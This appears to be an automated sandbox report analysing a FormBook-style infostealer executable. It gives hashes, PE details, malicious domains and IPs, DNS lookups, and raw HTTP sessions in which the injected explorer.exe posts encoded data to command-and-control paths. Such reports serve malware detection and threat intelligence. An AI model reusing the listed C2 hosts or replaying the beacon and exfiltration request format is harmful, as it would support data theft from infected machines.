                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
38.55.236.89 | www.ope-cctv.com | United States | 174 | COGENT-174US | true
89.31.143.1 | www.dersameh.com | Germany | 15598 | QSC-AG-IPXDE | true
172.67.148.132 | www.canadianlocalbusiness.com | United States | 13335 | CLOUDFLARENETUS | true
54.38.220.85 | www.darkchocolatebliss.com | France | 16276 | OVHFR | true
162.213.255.142 | www.marketmall.digital | United States | 22612 | NAMECHEAP-NETUS | true
154.209.6.241 | www.y31jaihdb6zm87.buzz | Seychelles | 136970 | YISUCLOUDLTD-AS-APYISUCLOUDLTDHK | true
                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                        Analysis ID:756156
                                        Start date and time:2022-11-29 18:23:12 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:NHYGUnNN.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@4/2@6/6
                                        EGA Information:
                                        • Successful, ratio: 66.7%
                                        HDC Information:
                                        • Successful, ratio: 41.7% (good quality ratio 36.2%)
                                        • Quality average: 71.1%
                                        • Quality standard deviation: 33.6%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 128
                                        • Number of non-executed functions: 199
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                        • Execution Graph export aborted for target NHYGUnNN.exe, PID 5380 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        No simulations
                                        Process:C:\Users\user\Desktop\NHYGUnNN.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):226
                                        Entropy (8bit):5.354940450065058
                                        Encrypted:false
                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                        MD5:B10E37251C5B495643F331DB2EEC3394
                                        SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                        SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                        SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                        Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                        Category:dropped
                                        Size (bytes):94208
                                        Entropy (8bit):1.2891393435168748
                                        Encrypted:false
                                        SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                        MD5:037D23498B81732EEAAAD0E8015F3F85
                                        SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                        SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                        SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:SQLite format
                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.833885184563826
                                        TrID:
                                        • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                        • Win64 Executable GUI (202006/5) 44.25%
                                        • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                        • Win64 Executable (generic) (12005/4) 2.63%
                                        • Generic Win/DOS Executable (2004/3) 0.44%
                                        File name:NHYGUnNN.exe
                                        File size:275456
                                        MD5:4f9c8432b57fa1aa875071de547ba947
                                        SHA1:e1cc52fd851621743ba562a65161bfafed8e6b2b
                                        SHA256:9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
                                        SHA512:ced221c2e5225a8ead486e52f1c5307b24dbaff8864c7262f2d6f58cad3184753d1f2afe525c3afa122ddcafeab38845dafd2f7a22169bfac026375e7962481d
                                        SSDEEP:6144:RhwendE8+/O+oImP2Qcy7ZwpeA9pg6Cer0K7+UUcT9gxyRClRcOpoik:EAHdP7ZwpeApT0K7+UUQ99RORcOpoR
                                        TLSH:B24401917785748FC98ECF3B86A03859097991733B0BD39B94423CA9491E3DE5E13BA3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......c..............0......0........... ....@...... ....................................`...@......@............... .....
                                        Icon Hash:30f0c4ccccc6b010
                                        Entrypoint:0x400000
                                        Entrypoint Section:
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6385B386 [Tue Nov 29 07:23:50 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:
                                        Instruction
                                        dec ebp
                                        pop edx
                                        nop
                                        add byte ptr [ebx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0x1714 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3e660 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x41628 | 0x41800 | False | 0.9183936665076335 | data | 7.879743437690199 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x44000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x46000 | 0x1714 | 0x1800 | False | 0.265625 | data | 4.38448712577448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x46130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | |
RT_GROUP_ICON | 0x471d8 | 0x14 | data | |
RT_VERSION | 0x471ec | 0x33c | data | |
RT_MANIFEST | 0x47528 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/22-18:25:42.914102 | TCP | 2829004 | ETPRO TROJAN FormBook CnC Checkin (POST) | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                        Nov 29, 2022 18:25:21.776768923 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:21.795433998 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.795470953 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.795599937 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:22.783147097 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:22.801913977 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.803277016 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.821763039 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.821918011 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.822163105 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.840464115 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.840503931 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.840524912 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.846643925 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.865328074 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.865495920 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.865695000 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.883969069 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884027958 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884074926 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884263992 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.884419918 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.902769089 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:31.069607019 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:31.454494953 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:31.454699993 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:31.457118988 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.221436024 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.471544981 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.606439114 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606645107 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606683016 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606717110 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.606791973 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.856290102 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.856455088 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:33.490314960 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:36.508388996 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.519331932 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.913681030 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:42.913929939 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.914102077 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:43.308163881 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:43.308239937 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:43.925580978 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.097312927 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.491835117 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:44.491909027 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:44.492044926 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.494973898 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.942090988 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.283199072 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.283349991 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.330370903 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.330629110 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.330832005 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.718837976 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.718872070 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.718908072 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.719166040 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.719367027 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:46.107592106 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:50.809870005 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:50.989680052 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:50.990933895 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:50.991030931 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:51.162309885 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:51.284145117 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:51.284233093 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:51.284377098 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:52.005625010 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.020534992 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.192018986 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.192198038 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.235179901 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.406793118 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.524674892 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.524713993 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.524817944 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:54.282042027 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.252006054 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.424319983 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.424472094 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.424715042 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.596029043 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.725609064 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.725667953 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.725946903 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.737184048 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.908736944 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:26:01.776572943 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:01.797131062 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:01.797245979 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:01.797384977 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:01.817897081 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.036621094 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.036678076 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.036843061 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:02.038217068 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.041400909 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:02.802215099 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.818989992 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.839960098 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:03.840537071 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.840754986 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.861567020 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:03.861615896 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.094774008 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.094841957 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.094907045 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.095092058 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:04.115966082 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:05.864998102 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:05.882400036 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:05.883270025 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:05.883320093 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:05.900358915 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.166044950 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.166151047 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.166302919 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:06.406423092 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.406624079 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:06.406699896 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:06.423780918 CET8049729172.67.148.132192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 18:25:06.826121092 CET | 192.168.2.6 | 8.8.8.8 | 0x2214 | Standard query (0) | www.ope-cctv.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:12.510191917 CET | 192.168.2.6 | 8.8.8.8 | 0x7524 | Standard query (0) | www.dersameh.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:21.723710060 CET | 192.168.2.6 | 8.8.8.8 | 0x2444 | Standard query (0) | www.darkchocolatebliss.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:30.897186995 CET | 192.168.2.6 | 8.8.8.8 | 0xa02a | Standard query (0) | www.y31jaihdb6zm87.buzz | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:50.761020899 CET | 192.168.2.6 | 8.8.8.8 | 0xeb7d | Standard query (0) | www.marketmall.digital | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:01.743686914 CET | 192.168.2.6 | 8.8.8.8 | 0xd179 | Standard query (0) | www.canadianlocalbusiness.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 18:25:06.849574089 CET | 8.8.8.8 | 192.168.2.6 | 0x2214 | No error (0) | www.ope-cctv.com | | 38.55.236.89 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:12.532123089 CET | 8.8.8.8 | 192.168.2.6 | 0x7524 | No error (0) | www.dersameh.com | | 89.31.143.1 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:21.755763054 CET | 8.8.8.8 | 192.168.2.6 | 0x2444 | No error (0) | www.darkchocolatebliss.com | | 54.38.220.85 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:31.068085909 CET | 8.8.8.8 | 192.168.2.6 | 0xa02a | No error (0) | www.y31jaihdb6zm87.buzz | | 154.209.6.241 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:25:50.808146954 CET | 8.8.8.8 | 192.168.2.6 | 0xeb7d | No error (0) | www.marketmall.digital | | 162.213.255.142 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:01.772579908 CET | 8.8.8.8 | 192.168.2.6 | 0xd179 | No error (0) | www.canadianlocalbusiness.com | | 172.67.148.132 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:01.772579908 CET | 8.8.8.8 | 192.168.2.6 | 0xd179 | No error (0) | www.canadianlocalbusiness.com | | 104.21.29.63 | A (IP address) | IN (0x0001) | false
                                        • www.ope-cctv.com
                                        • www.dersameh.com
                                        • www.darkchocolatebliss.com
                                        • www.y31jaihdb6zm87.buzz
                                        • www.marketmall.digital
                                        • www.canadianlocalbusiness.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49714 | 38.55.236.89 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 18:25:07.177280903 CET | 118 | OUT | GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1
                                        Host: www.ope-cctv.com
                                        Connection: close
Nov 29, 2022 18:25:07.496047974 CET | 119 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:25:07 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49715 | 89.31.143.1 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 18:25:12.554054976 CET | 120 | OUT | POST /4u5a/ HTTP/1.1
                                        Host: www.dersameh.com
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.dersameh.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.dersameh.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
Nov 29, 2022 18:25:12.576395035 CET | 120 | IN | HTTP/1.1 405 Not Allowed
                                        Date: Tue, 29 Nov 2022 17:25:12 GMT
                                        Content-Type: text/html
                                        Content-Length: 150
                                        Connection: close
                                        Server: UD Forwarding 3.1
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49724 | 162.213.255.142 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 18:25:50.991030931 CET | 145 | OUT | POST /4u5a/ HTTP/1.1
                                        Host: www.marketmall.digital
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.marketmall.digital
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.marketmall.digital/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Ascii: l0GX=z1yV~d~FGj03VrljX0uYxQGghe8U5b5nNx~PGnSbgcLWDOoshYS7g5HjO5vnw2gbpC1zXPIrJIWRtJDh4rVKSjuUxo(EPH~RKee4wKD7wj3xi1kNcfLrhceDtr76W1akL1wg7woOaXFWjk6sd-6E92CIB-Mwr-S6vNvlvKQwSxRDEvE9JWF2a6o.
Nov 29, 2022 18:25:51.284145117 CET | 147 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:25:51 GMT
                                        Server: Apache
                                        Content-Length: 1080
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.6 | 49725 | 162.213.255.142 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 18:25:53.235179901 CET | 149 | OUT | POST /4u5a/ HTTP/1.1
                                        Host: www.marketmall.digital
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.marketmall.digital
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.marketmall.digital/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Nov 29, 2022 18:25:53.524674892 CET | 150 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:25:53 GMT
                                        Server: Apache
                                        Content-Length: 1080
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        12 | 192.168.2.6 | 49726 | 162.213.255.142 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 29, 2022 18:25:56.424715042 CET | 151 | OUT | GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1
                                        Host: www.marketmall.digital
                                        Connection: close
